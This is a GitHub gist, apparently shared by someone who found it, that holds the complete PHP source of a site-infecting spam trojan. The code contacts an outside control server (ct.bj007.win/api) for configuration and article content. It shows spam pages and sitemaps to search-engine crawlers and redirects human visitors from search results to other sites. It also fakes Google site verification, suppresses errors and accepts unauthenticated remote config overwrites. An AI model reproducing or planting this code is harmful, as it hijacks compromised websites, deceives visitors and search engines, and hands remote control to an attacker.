Skip to content

Instantly share code, notes, and snippets.

@FDiskas

FDiskas/china-trojan.php

Created November 11, 2016 08:48
Show Gist options
  • Save FDiskas/da67c31ef4944c6be9a55c57e9bb0d3f to your computer and use it in GitHub Desktop.
Save FDiskas/da67c31ef4944c6be9a55c57e9bb0d3f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
china-trojan.php
<?php
ini_set('memory_limit', '-1');
@ini_set('max_execution_time', 0);
@set_time_limit(0);
error_reporting(0);
@ini_set('display_errors', 0);
$ct_dir = dirname(__FILE__)."/bak";
$req_path = $_SERVER["REQUEST_URI"];
$ip = $_SERVER["REMOTE_ADDR"];
if(preg_match("/google(.*).html/i",$req_path,$res))
{
echo "google-site-verification: google".$res[1].".html";
exit;
}
$api = "http://ct.bj007.win/api";
if($_GET["ctset"]==1)
{
CtSet();
exit();
}
if($_GET["ctset"]==2)
{
CtGet();
exit();
}
if(!IsBot()&&!IsClickFromSE()) return;
$xsl_sitemapindex= str_replace($_SERVER['DOCUMENT_ROOT'], '', dirname(__FILE__))."/sitemapindex.xsl";
$xsl_sitemap= str_replace($_SERVER['DOCUMENT_ROOT'], '', dirname(__FILE__))."/sitemap.xsl";
if(preg_match("/psmp\/p(\d+)/i",$req_path,$res))
{
$action = "sitemap";
$page = $res[1];
}
elseif(preg_match("/sitemap\/(.*)/i",$req_path,$res))
{
$action = "mapindex";
$apikey = $res[1];
}
else
{
$action = "article";
}
InitCfg();
if($action=="mapindex")
{
header('Content-type: text/xml; charset=utf-8');
MapIndex();exit();
}
elseif($action=="sitemap")
{
header('Content-type: text/xml; charset=utf-8');
SiteMap();exit();
}
elseif($action=="article")
{
header('Content-Type:text/html; charset=utf-8');
$reqp = $_SERVER["REQUEST_URI"];
$id = $url_id[$reqp];
if(empty($id)) return;
Article();exit();
}
else
{
return;
}
function Article()
{
global $art,$api,$site_cfg,$cat_cfg,$ip,$id,$url_id;
$art = GetCont();
$tdcid = $art->tdcid;
$cat_host = $cat_cfg->$tdcid;
$ct_stat_url = $api."/ipstat/?ip=".$ip."&apikey=".$site_cfg->ApiKey;
$sp_url = "http://".$cat_host.$art->url;
$img_stat = "<script type=\"text/javascript\" src=\"".$ct_stat_url."\"></script>";
if(!IsBot())
{
if($site_cfg->JsOrBot301==1)
{
echo $img_stat."<script>document.location.href='".$sp_url."'</script>";
return;
}
}
$skin = $site_cfg->Skin;
$minId = $id-5;
if($minId<=0) $minId =1;
$maxId = $id+5;
if($maxId>=$site_cfg->ArtNum) $maxId =$site_cfg->ArtNum;
//rlt arts
$tits = GetTDB($minId,$maxId);
if(preg_match("/{!-- begin rltarts --}([\s\S]+?){!-- end --}/i",$skin,$res))
{
$token = $res[1];
}
$rlt_arts = "";
$http = $site_cfg->UrlRule;
$http = substr($http,0,stripos($http,"/",8));
$url_id_key = array_keys($url_id);
foreach($tits as $tit)
{
$spt_pos = strpos($tit,"|");
$title = substr($tit,$spt_pos+1);
$rlt_tmp = $token;
$url = $http.$url_id_key[$minId-1];
$minId++;
$rlt_tmp = str_replace("#{article.Title}",$title,$rlt_tmp);
$rlt_tmp = str_replace("#{article.Url}",$url,$rlt_tmp);
$rlt_arts = $rlt_arts . $rlt_tmp;
}
$art_url = $url_id_key[$id-1];
$skin = preg_replace('/{!-- begin rltarts --}([\s\S]+?){!-- end --}/i' ,$rlt_arts,$skin);
$skin = str_replace("#{article.Title}",$art->title,$skin);
$skin = str_replace("#{article.Cont}" ,$art->cont,$skin);
$skin = str_replace("#{article.Des}" ,$art->des,$skin);
$skin = str_replace("#{article.Url}" ,$art_url,$skin);
$skin = str_replace("#{redirect_url}" ,String2Hex($sp_url),$skin);
$skin = str_replace("</body>",$img_stat,$skin);
echo $skin;
}
function String2Hex($string){
$hex='';
for ($i=0; $i < strlen($string); $i++){
$hex .= "\x".dechex(ord($string[$i]));
}
return $hex;
}
function GetCont()
{
global $ct_dir,$id,$api,$site_cfg,$cat_cfg;
$art_f = $ct_dir."/".($id%200);
if(!file_exists($art_f))
{
mkdir($art_f);
}
$art_f = $ct_dir."/".($id%200)."/".$id.".txt";
if(!file_exists($art_f))
{
$conts = GetTDB($id,$id);
$title = $conts[0];
$ids = substr($title,0,strpos($title,"|"));
$t_c = explode("_",$ids);
$tid = $t_c[0];
$tcid = $t_c[1];
$cont = FFGet($api."/GetArtCont/?nl=1&tdid=".$tid."&tdcid=".$tcid);
file_put_contents($art_f, $cont);
}
else
{
$cont = file_get_contents($art_f);
}
$art = json_decode($cont);
return $art;
}
function IsBot()
{
$ua=$_SERVER['HTTP_USER_AGENT'];
return (stripos($ua,"bot")||stripos($ua,"spider")||stripos($ua,"yahoo")||stripos($ua,"seznam")||stripos($ua,"bing"));
}
function IsClickFromSE()
{
$ref=$_SERVER['HTTP_REFERER'];
return (stripos($ref,"google")||stripos($ref,"yahoo")||stripos($ref,"bing")||stripos($ref,"seznam"));
}
function FFGet( $url ){
$file_contents ='';
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if(function_exists('file_get_contents')){
ini_set('user_agent',$user_agent);
try
{
$file_contents = @file_get_contents( $url );
}
catch (Exception $e)
{ }
}
if(strlen($file_contents)<1&&function_exists('curl_init')){
try
{
$file_contents ="";
$ch = curl_init();
$timeout = 30;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
curl_setopt($ch,CURLOPT_USERAGENT,$user_agent);
$file_contents = curl_exec( $ch);
curl_close( $ch );
}
catch (Exception $e)
{}
}
if($file_contents=="503"||$file_contents=="")
{
ob_start();
header('HTTP/1.1 503 Service Temporarily Unavailable');
header('Status: 503 Service Temporarily Unavailable');
header('Retry-After:1200');
header('X-Powered-By:Apache');
exit();
}
return $file_contents;
}
function InitCfg()
{
global $ct_dir,$apikey,$api,$site_cfg,$cat_cfg,$tdb_f,$url_id;
if(!file_exists($ct_dir))
{
mkdir($ct_dir);
}
$url_id_f = $ct_dir."/urlid.txt";
if(!file_exists($url_id_f))
{
$jdata = FFGet($api."/GetUrlId/?apikey=".$apikey);
if(empty($jdata))
{
echo "wait";exit();
}
file_put_contents($url_id_f, $jdata);
}
else
{
$jdata = file_get_contents( $url_id_f );
}
$url_id = (array)json_decode($jdata);
$site_cfg_f = $ct_dir."/siteconfig.txt";
if(!file_exists($site_cfg_f))
{
$jdata = FFGet($api."/GetSiteConfig/?apikey=".$apikey);
file_put_contents($site_cfg_f, $jdata);
}
else
{
$jdata = file_get_contents( $site_cfg_f );
}
$site_cfg = json_decode($jdata);
$tdb_f = $ct_dir."/tdb.txt";
if(!file_exists($tdb_f))
{
$cids = explode(",",$site_cfg->TitleDbCateogry);
foreach($cids as $cid)
{
$data = FFGet($api."/GetTitleDb/?sh=1&catId=".$cid);
$fp=fopen($tdb_f,"a");
fwrite($fp, $data);
}
fclose($fp);
}
$cat_f = $ct_dir."/category.txt";
if(!file_exists($cat_f))
{
$jdata = FFGet($api."/GetTitleDbCategories/?catId=".$site_cfg->TitleDbCateogry);
file_put_contents($cat_f, $jdata);
}
else
{
$jdata = file_get_contents( $cat_f );
}
$cat_cfg = json_decode($jdata);
}
function CtSet()
{
global $ct_dir;
$site = $_POST["site"];
$cat = $_POST["cat"];
$site_cfg_f = $ct_dir."/siteconfig.txt";
file_put_contents($site_cfg_f, $site);
$cat_f = $ct_dir."/category.txt";
file_put_contents($cat_f, $cat);
echo("ok");
}
function CtGet()
{
global $ct_dir,$apikey,$api,$site_cfg,$cat_cfg,$tdb_f;
$site_cfg_f = $ct_dir."/siteconfig.txt";
$jdata = file_get_contents( $site_cfg_f );
$site_cfg = json_decode($jdata);
$cat_f = $ct_dir."/category.txt";
$jdata = FFGet($api."/GetTitleDbCategories/?catId=".$site_cfg->TitleDbCateogry);
file_put_contents($cat_f, $jdata);
echo("ok");
}
function GetTDB($startLine = 1, $endLine=50, $method='rb') {
global $tdb_f;
$filename = $tdb_f;
$content = array();
$count = $endLine - $startLine;
if(version_compare(PHP_VERSION, '5.1.0', '>=')){
$fp = new SplFileObject($filename, $method);
$fp->seek($startLine-1);
for($i = 0; $i <= $count; ++$i) {
$content[]=$fp->current();
$fp->next();
}
}else{
$fp = fopen($filename, $method);
if(!$fp) return 'error:can not read file';
for ($i=1;$i<$startLine;++$i) {
fgets($fp);
}
for($i;$i<=$endLine;++$i){
$content[]=fgets($fp);
}
fclose($fp);
}
return array_filter($content);
}
function SiteMap()
{
global $site_cfg,$xsl_sitemap,$page,$url_id;
$http = $site_cfg->UrlRule;
$http = substr($http,0,stripos($http,"/",8));
$minId = ($page-1)*1000 +1;
if($minId<=0) $minId=1;
$maxId = $page*1000;
if($maxId>$site_cfg->ArtNum) $maxId = $site_cfg->ArtNum;
$content = GetTDB($minId,$maxId);
$url_id_key = array_keys($url_id);
$sps = "";
foreach($content as $cont)
{
$url = $http.htmlspecialchars($url_id_key[$minId-1]);
$minId++;
$sps = $sps."<url>"
."<loc>".$url."</loc>"
."<priority>1.0</priority>"
."</url>";
}
echo "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"
."<?xml-stylesheet type=\"text/xsl\" href=\"".$xsl_sitemap."\" ?>"
."<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemalocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd\"
xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">
"
.$sps
."
</urlset>";
}
function MapIndex()
{
global $site_cfg,$xsl_sitemapindex;
$total_art = $site_cfg->ArtNum;
$ps = $total_art/1000;
if($total_art%1000>0)
{
$ps++;
}
$http = $site_cfg->UrlRule;
$http = substr($http,0,stripos($http,"/",8));
$sps = "";
for($i=1;$i<=$ps;$i++)
{
$sps = $sps."<sitemap>"
."<loc>".$http."/psmp/p".$i."</loc>"
."<priority>1.0</priority>"
."</sitemap>";
}
echo "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"
."<?xml-stylesheet type=\"text/xsl\" href=\"".$xsl_sitemapindex."\" ?>"
."<sitemapindex xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xsi:schemalocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd\"
xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">"
.$sps
."</sitemapindex>";
}
?>
@FDiskas
Copy link
Author

FDiskas commented Nov 11, 2016

📙 There is some API http://ct.bj007.win/api/GetSiteConfig/?apikey=8dcabf

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment